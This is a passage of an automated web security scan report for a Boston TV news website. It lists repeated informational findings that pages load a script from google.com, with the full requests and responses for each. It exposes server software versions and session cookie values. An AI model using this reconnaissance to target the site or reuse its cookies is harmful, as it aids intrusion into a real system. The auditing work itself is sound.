Cookie: ACC1TAB=1; __utmz=208585492.1295906131.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=208585492.509901533.1295906131.1295906131.1295906131.1; WHDHSTR=d2c1b5275a3ff835402a31251d91c0c5; __utmc=208585492; __utmb=208585492.3.10.1295906131;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 00:11:10 GMT
Server: Apache/2.0.46 (Red Hat)
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Cache-Control: must-revalidate
Age: 1
Cache-Control: max-age=1748
Via: HTTP/1.1 www1.whdh.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Tue, 25 Jan 2011 00:39:27 GMT
Content-Type: text/html; charset=ISO-8859-1
Via: 1.1 mdw107104 (MII-APC/1.6)
Connection: close
Content-Length: 33647

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>WHDH NBC Boston 7NEWS Boston North News</title>
<meta name="publisher" content="New
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://www1.whdh.com/js/jq/jquery.ui/css/test/jquery-ui-1.7.2.custom.css" media="all" /><script src="http://www.google.com/jsapi"></script>
...[SNIP]...

21.1568. http://www1.whdh.com/news/main/local/south/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www1.whdh.com
Path:   /news/main/local/south/

Issue detail

The response dynamically includes the following script from another domain:
  • http://www.google.com/jsapi

Request

GET /news/main/local/south/ HTTP/1.1
Host: www1.whdh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ACC1TAB=1; __utmz=208585492.1295906131.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=208585492.509901533.1295906131.1295906131.1295906131.1; WHDHSTR=d2c1b5275a3ff835402a31251d91c0c5; __utmc=208585492; __utmb=208585492.3.10.1295906131;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 00:00:26 GMT
Server: Apache/2.0.46 (Red Hat)
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Cache-Control: must-revalidate
Age: 644
Cache-Control: max-age=1749
Via: HTTP/1.1 www1.whdh.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Tue, 25 Jan 2011 00:28:45 GMT
Content-Type: text/html; charset=ISO-8859-1
Via: 1.1 mdw107114 (MII-APC/1.6)
Connection: close
Content-Length: 33268

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>WHDH NBC Boston 7NEWS Boston South News</title>
<meta name="publisher" content="New
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://www1.whdh.com/js/jq/jquery.ui/css/test/jquery-ui-1.7.2.custom.css" media="all" /><script src="http://www.google.com/jsapi"></script>
...[SNIP]...

21.1569. http://www1.whdh.com/news/main/local/worcester-area/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www1.whdh.com
Path:   /news/main/local/worcester-area/

Issue detail

The response dynamically includes the following script from another domain:
  • http://www.google.com/jsapi

Request

GET /news/main/local/worcester-area/ HTTP/1.1
Host: www1.whdh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ACC1TAB=1; __utmz=208585492.1295906131.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=208585492.509901533.1295906131.1295906131.1295906131.1; WHDHSTR=d2c1b5275a3ff835402a31251d91c0c5; __utmc=208585492; __utmb=208585492.3.10.1295906131;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 00:11:12 GMT
Server: Apache/2.0.46 (Red Hat)
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Cache-Control: must-revalidate
Age: 2
Cache-Control: max-age=1746
Via: HTTP/1.1 www1.whdh.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Tue, 25 Jan 2011 00:39:26 GMT
Content-Type: text/html; charset=ISO-8859-1
Via: 1.1 mdw107113 (MII-APC/1.6)
Connection: close
Content-Length: 33159

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>WHDH NBC Boston 7NEWS Worcester, Massachussetts Area News</title>
<meta name="publis
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://www1.whdh.com/js/jq/jquery.ui/css/test/jquery-ui-1.7.2.custom.css" media="all" /><script src="http://www.google.com/jsapi"></script>
...[SNIP]...

21.1570. http://www1.whdh.com/news/main/national/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www1.whdh.com
Path:   /news/main/national/

Issue detail

The response dynamically includes the following script from another domain:
  • http://www.google.com/jsapi

Request

GET /news/main/national/ HTTP/1.1
Host: www1.whdh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ACC1TAB=1; __utmz=208585492.1295906131.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=208585492.509901533.1295906131.1295906131.1295906131.1; WHDHSTR=d2c1b5275a3ff835402a31251d91c0c5; __utmc=208585492; __utmb=208585492.1.10.1295906131;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:55:14 GMT
Server: Apache/2.0.46 (Red Hat)
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Cache-Control: must-revalidate
Age: 0
Cache-Control: max-age=1750
Via: HTTP/1.1 www1.whdh.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Mon, 24 Jan 2011 22:23:34 GMT
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 33220
Via: 1.1 dfw107006 (MII-APC/1.6)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>WHDH NBC Boston 7NEWS National US News</title>
<meta name="publisher" content="New E
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://www1.whdh.com/js/jq/jquery.ui/css/test/jquery-ui-1.7.2.custom.css" media="all" /><script src="http://www.google.com/jsapi"></script>
...[SNIP]...

21.1571. http://www1.whdh.com/news/main/national/tragedy-in-tucson/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www1.whdh.com
Path:   /news/main/national/tragedy-in-tucson/

Issue detail

The response dynamically includes the following script from another domain:
  • http://www.google.com/jsapi

Request

GET /news/main/national/tragedy-in-tucson/ HTTP/1.1
Host: www1.whdh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ACC1TAB=1; __utmz=208585492.1295906131.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=208585492.509901533.1295906131.1295906131.1295906131.1; WHDHSTR=d2c1b5275a3ff835402a31251d91c0c5; __utmc=208585492; __utmb=208585492.1.10.1295906131;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:55:14 GMT
Server: Apache/2.0.46 (Red Hat)
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Cache-Control: must-revalidate
Age: 0
Cache-Control: max-age=1747
Via: HTTP/1.1 www1.whdh.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Mon, 24 Jan 2011 22:23:29 GMT
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 34788
Via: 1.1 dfw107010 (MII-APC/1.6)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>WHDH NBC Boston 7NEWS National US News</title>
<meta name="publisher" content="New E
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://www1.whdh.com/js/jq/jquery.ui/css/test/jquery-ui-1.7.2.custom.css" media="all" /><script src="http://www.google.com/jsapi"></script>
...[SNIP]...

21.1572. http://www1.whdh.com/news/main/politics/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www1.whdh.com
Path:   /news/main/politics/

Issue detail

The response dynamically includes the following script from another domain:
  • http://www.google.com/jsapi

Request

GET /news/main/politics/ HTTP/1.1
Host: www1.whdh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ACC1TAB=1; __utmz=208585492.1295906131.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=208585492.509901533.1295906131.1295906131.1295906131.1; WHDHSTR=d2c1b5275a3ff835402a31251d91c0c5; __utmc=208585492; __utmb=208585492.1.10.1295906131;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:55:11 GMT
Server: Apache/2.0.46 (Red Hat)
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Cache-Control: must-revalidate
Age: 0
Cache-Control: max-age=796
Via: HTTP/1.1 www1.whdh.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Mon, 24 Jan 2011 22:07:37 GMT
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 33251
Via: 1.1 dfw107002 (MII-APC/1.6)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>WHDH NBC Boston 7NEWS Politics</title>
<meta name="publisher" content="New England N
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://www1.whdh.com/js/jq/jquery.ui/css/test/jquery-ui-1.7.2.custom.css" media="all" /><script src="http://www.google.com/jsapi"></script>
...[SNIP]...

21.1573. http://www1.whdh.com/news/main/sports/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www1.whdh.com
Path:   /news/main/sports/

Issue detail

The response dynamically includes the following script from another domain:
  • http://www.google.com/jsapi

Request

GET /news/main/sports/ HTTP/1.1
Host: www1.whdh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ACC1TAB=1; __utmz=208585492.1295906131.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=208585492.509901533.1295906131.1295906131.1295906131.1; WHDHSTR=d2c1b5275a3ff835402a31251d91c0c5; __utmc=208585492; __utmb=208585492.1.10.1295906131;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:38:58 GMT
Server: Apache/2.0.46 (Red Hat)
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Cache-Control: must-revalidate
Age: 973
Cache-Control: max-age=1750
Via: HTTP/1.1 www1.whdh.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Mon, 24 Jan 2011 22:07:18 GMT
Content-Type: text/html; charset=ISO-8859-1
Via: 1.1 dfw107010 (MII-APC/1.6)
Connection: close
Content-Length: 33196

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>WHDH NBC Boston 7NEWS Sports</title>
<meta name="publisher" content="New England New
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://www1.whdh.com/js/jq/jquery.ui/css/test/jquery-ui-1.7.2.custom.css" media="all" /><script src="http://www.google.com/jsapi"></script>
...[SNIP]...

21.1574. http://www1.whdh.com/news/main/viewervoices/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www1.whdh.com
Path:   /news/main/viewervoices/

Issue detail

The response dynamically includes the following script from another domain:
  • http://www.google.com/jsapi

Request

GET /news/main/viewervoices/ HTTP/1.1
Host: www1.whdh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ACC1TAB=1; __utmz=208585492.1295906131.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=208585492.509901533.1295906131.1295906131.1295906131.1; WHDHSTR=d2c1b5275a3ff835402a31251d91c0c5; __utmc=208585492; __utmb=208585492.1.10.1295906131;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:55:19 GMT
Server: Apache/2.0.46 (Red Hat)
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Cache-Control: must-revalidate
Age: 0
Cache-Control: max-age=1749
Via: HTTP/1.1 www1.whdh.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Mon, 24 Jan 2011 22:23:38 GMT
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 33153
Via: 1.1 dfw107002 (MII-APC/1.6)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title></title>
<meta name="publisher" content="New England News Station Boston Channel 7 W
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://www1.whdh.com/js/jq/jquery.ui/css/test/jquery-ui-1.7.2.custom.css" media="all" /><script src="http://www.google.com/jsapi"></script>
...[SNIP]...

21.1575. http://www1.whdh.com/news/main/world/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www1.whdh.com
Path:   /news/main/world/

Issue detail

The response dynamically includes the following script from another domain:
  • http://www.google.com/jsapi

Request

GET /news/main/world/ HTTP/1.1
Host: www1.whdh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ACC1TAB=1; __utmz=208585492.1295906131.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=208585492.509901533.1295906131.1295906131.1295906131.1; WHDHSTR=d2c1b5275a3ff835402a31251d91c0c5; __utmc=208585492; __utmb=208585492.1.10.1295906131;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:55:17 GMT
Server: Apache/2.0.46 (Red Hat)
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Cache-Control: must-revalidate
Age: 0
Cache-Control: max-age=1750
Via: HTTP/1.1 www1.whdh.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Mon, 24 Jan 2011 22:23:37 GMT
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 32994
Via: 1.1 dfw107003 (MII-APC/1.6)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>WHDH NBC Boston 7NEWS World News</title>
<meta name="publisher" content="New England
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://www1.whdh.com/js/jq/jquery.ui/css/test/jquery-ui-1.7.2.custom.css" media="all" /><script src="http://www.google.com/jsapi"></script>
...[SNIP]...

21.1576. http://www1.whdh.com/newsteam/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www1.whdh.com
Path:   /newsteam/

Issue detail

The response dynamically includes the following script from another domain:
  • http://www.google.com/jsapi

Request

GET /newsteam/ HTTP/1.1
Host: www1.whdh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ACC1TAB=1; __utmz=208585492.1295906131.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=208585492.509901533.1295906131.1295906131.1295906131.1; WHDHSTR=d2c1b5275a3ff835402a31251d91c0c5; __utmc=208585492; __utmb=208585492.1.10.1295906131;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:57:17 GMT
Server: Apache/2.0.46 (Red Hat)
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Cache-Control: must-revalidate
Age: 0
Cache-Control: max-age=1737
Via: HTTP/1.1 www1.whdh.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Mon, 24 Jan 2011 22:25:24 GMT
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 28153
Via: 1.1 dfw107005 (MII-APC/1.6)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>WHDH-TV News Team</title>
<meta name="publisher" content="New England News Station B
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://www1.whdh.com/js/jq/jquery.ui/css/test/jquery-ui-1.7.2.custom.css" media="all" /><script src="http://www.google.com/jsapi"></script>
...[SNIP]...

21.1577. http://www1.whdh.com/privacypolicy

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www1.whdh.com
Path:   /privacypolicy

Issue detail

The response dynamically includes the following script from another domain:
  • http://www.google.com/jsapi

Request

GET /privacypolicy HTTP/1.1
Host: www1.whdh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ACC1TAB=1; __utmz=208585492.1295906131.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=208585492.509901533.1295906131.1295906131.1295906131.1; WHDHSTR=d2c1b5275a3ff835402a31251d91c0c5; __utmc=208585492; __utmb=208585492.1.10.1295906131;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:57:08 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Location: privacypolicy.php
Vary: negotiate
TCN: choice
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Cache-Control: must-revalidate
Cache-Control: max-age=172800
Via: HTTP/1.1 www1.whdh.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Wed, 26 Jan 2011 21:56:18 GMT
Content-Type: text/html; charset=ISO-8859-1
Via: 1.1 dfw107022 (MII-APC/1.6)
Connection: close
Content-Length: 19843

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>WHDH-TV 7NEWS NBC - Privacy Policy</title>
<meta name="publisher" content="New Engla
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://www1.whdh.com/js/jq/jquery.ui/css/test/jquery-ui-1.7.2.custom.css" media="all" /><script src="http://www.google.com/jsapi"></script>
...[SNIP]...

21.1578. http://www1.whdh.com/rss/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www1.whdh.com
Path:   /rss/

Issue detail

The response dynamically includes the following script from another domain:
  • http://www.google.com/jsapi

Request

GET /rss/ HTTP/1.1
Host: www1.whdh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ACC1TAB=1; __utmz=208585492.1295906131.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=208585492.509901533.1295906131.1295906131.1295906131.1; WHDHSTR=d2c1b5275a3ff835402a31251d91c0c5; __utmc=208585492; __utmb=208585492.1.10.1295906131;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:57:17 GMT
Server: Apache/2.0.46 (Red Hat)
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Cache-Control: must-revalidate
Age: 0
Cache-Control: max-age=5101
Via: HTTP/1.1 www1.whdh.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Mon, 24 Jan 2011 23:21:32 GMT
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 18243
Via: 1.1 dfw107007 (MII-APC/1.6)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>WHDH-TV - RSS Feeds and Widgets</title>
<meta name="publisher" content="New England
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://www1.whdh.com/js/jq/jquery.ui/css/test/jquery-ui-1.7.2.custom.css" media="all" /><script src="http://www.google.com/jsapi"></script>
...[SNIP]...

21.1579. http://www1.whdh.com/sales/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www1.whdh.com
Path:   /sales/

Issue detail

The response dynamically includes the following script from another domain:
  • http://www.google.com/jsapi

Request

GET /sales/ HTTP/1.1
Host: www1.whdh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ACC1TAB=1; __utmz=208585492.1295906131.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=208585492.509901533.1295906131.1295906131.1295906131.1; WHDHSTR=d2c1b5275a3ff835402a31251d91c0c5; __utmc=208585492; __utmb=208585492.1.10.1295906131;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:58:03 GMT
Server: Apache/2.0.46 (Red Hat)
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Cache-Control: must-revalidate
Age: 0
Cache-Control: max-age=3430
Via: HTTP/1.1 www1.whdh.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Mon, 24 Jan 2011 22:54:23 GMT
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 9850
Via: 1.1 dfw107007 (MII-APC/1.6)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>WHDH-TV 7NEWS NBC - Sales</title>
<meta name="publisher" content="New England News S
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://www1.whdh.com/js/jq/jquery.ui/css/test/jquery-ui-1.7.2.custom.css" media="all" /><script src="http://www.google.com/jsapi"></script>
...[SNIP]...

21.1580. http://www1.whdh.com/slideshows/view/BitterBlastTemperatures

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www1.whdh.com
Path:   /slideshows/view/BitterBlastTemperatures

Issue detail

The response dynamically includes the following script from another domain:
  • http://www.google.com/jsapi

Request

GET /slideshows/view/BitterBlastTemperatures HTTP/1.1
Host: www1.whdh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ACC1TAB=1; __utmz=208585492.1295906131.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=208585492.509901533.1295906131.1295906131.1295906131.1; WHDHSTR=d2c1b5275a3ff835402a31251d91c0c5; __utmc=208585492; __utmb=208585492.1.10.1295906131;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:57:19 GMT
Server: Apache/2.0.46 (Red Hat)
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Age: 0
Via: HTTP/1.1 www1.whdh.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Mon, 31 Jan 2011 21:57:19 GMT
Cache-Control: max-age=604800
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 21954
Via: 1.1 dfw107005 (MII-APC/1.6)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>WHDH Gallery: Bitter Blast Temperatures</title>
<meta name="publisher" content="New
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://www1.whdh.com/js/jq/jquery.ui/css/test/jquery-ui-1.7.2.custom.css" media="all" /><script src="http://www.google.com/jsapi"></script>
...[SNIP]...

21.1581. http://www1.whdh.com/slideshows/view/FunintheSnow

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www1.whdh.com
Path:   /slideshows/view/FunintheSnow

Issue detail

The response dynamically includes the following script from another domain:
  • http://www.google.com/jsapi

Request

GET /slideshows/view/FunintheSnow HTTP/1.1
Host: www1.whdh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ACC1TAB=1; __utmz=208585492.1295906131.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=208585492.509901533.1295906131.1295906131.1295906131.1; WHDHSTR=d2c1b5275a3ff835402a31251d91c0c5; __utmc=208585492; __utmb=208585492.1.10.1295906131;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:57:22 GMT
Server: Apache/2.0.46 (Red Hat)
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Age: 0
Warning: 113 www1.whdh.com "Heuristic expiration" "Mon, 24 Jan 2011 21:57:22 GMT"
Via: HTTP/1.1 www1.whdh.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Mon, 31 Jan 2011 21:57:22 GMT
Cache-Control: max-age=604800
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 23022
Via: 1.1 dfw107017 (MII-APC/1.6)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>WHDH Gallery: Fun in the Snow</title>
<meta name="publisher" content="New England Ne
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://www1.whdh.com/js/jq/jquery.ui/css/test/jquery-ui-1.7.2.custom.css" media="all" /><script src="http://www.google.com/jsapi"></script>
...[SNIP]...

21.1582. http://www1.whdh.com/slideshows/view/January12thStormPets

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www1.whdh.com
Path:   /slideshows/view/January12thStormPets

Issue detail

The response dynamically includes the following script from another domain:
  • http://www.google.com/jsapi

Request

GET /slideshows/view/January12thStormPets HTTP/1.1
Host: www1.whdh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ACC1TAB=1; __utmz=208585492.1295906131.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=208585492.509901533.1295906131.1295906131.1295906131.1; WHDHSTR=d2c1b5275a3ff835402a31251d91c0c5; __utmc=208585492; __utmb=208585492.1.10.1295906131;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:55:49 GMT
Server: Apache/2.0.46 (Red Hat)
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Age: 94
Warning: 113 www1.whdh.com "Heuristic expiration" "Mon, 24 Jan 2011 21:55:49 GMT"
Via: HTTP/1.1 www1.whdh.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Mon, 31 Jan 2011 21:55:49 GMT
Cache-Control: max-age=604800
Content-Type: text/html; charset=ISO-8859-1
Via: 1.1 dfw107007 (MII-APC/1.6)
Content-Length: 22779
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>WHDH Gallery: Winter Weather - Snowy Pets</title>
<meta name="publisher" content="Ne
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://www1.whdh.com/js/jq/jquery.ui/css/test/jquery-ui-1.7.2.custom.css" media="all" /><script src="http://www.google.com/jsapi"></script>
...[SNIP]...

21.1583. http://www1.whdh.com/slideshows/view/January12thTreesDown

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www1.whdh.com
Path:   /slideshows/view/January12thTreesDown

Issue detail

The response dynamically includes the following script from another domain:
  • http://www.google.com/jsapi

Request

GET /slideshows/view/January12thTreesDown HTTP/1.1
Host: www1.whdh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ACC1TAB=1; __utmz=208585492.1295906131.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=208585492.509901533.1295906131.1295906131.1295906131.1; WHDHSTR=d2c1b5275a3ff835402a31251d91c0c5; __utmc=208585492; __utmb=208585492.1.10.1295906131;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:57:22 GMT
Server: Apache/2.0.46 (Red Hat)
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Age: 0
Warning: 113 www1.whdh.com "Heuristic expiration" "Mon, 24 Jan 2011 21:57:22 GMT"
Via: HTTP/1.1 www1.whdh.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Mon, 31 Jan 2011 21:57:22 GMT
Cache-Control: max-age=604800
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 23062
Via: 1.1 dfw107005 (MII-APC/1.6)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>WHDH Gallery: January 12th Trees Down</title>
<meta name="publisher" content="New En
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://www1.whdh.com/js/jq/jquery.ui/css/test/jquery-ui-1.7.2.custom.css" media="all" /><script src="http://www.google.com/jsapi"></script>
...[SNIP]...

21.1584. http://www1.whdh.com/slideshows/view/January18WinterStorm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www1.whdh.com
Path:   /slideshows/view/January18WinterStorm

Issue detail

The response dynamically includes the following script from another domain:
  • http://www.google.com/jsapi

Request

GET /slideshows/view/January18WinterStorm HTTP/1.1
Host: www1.whdh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
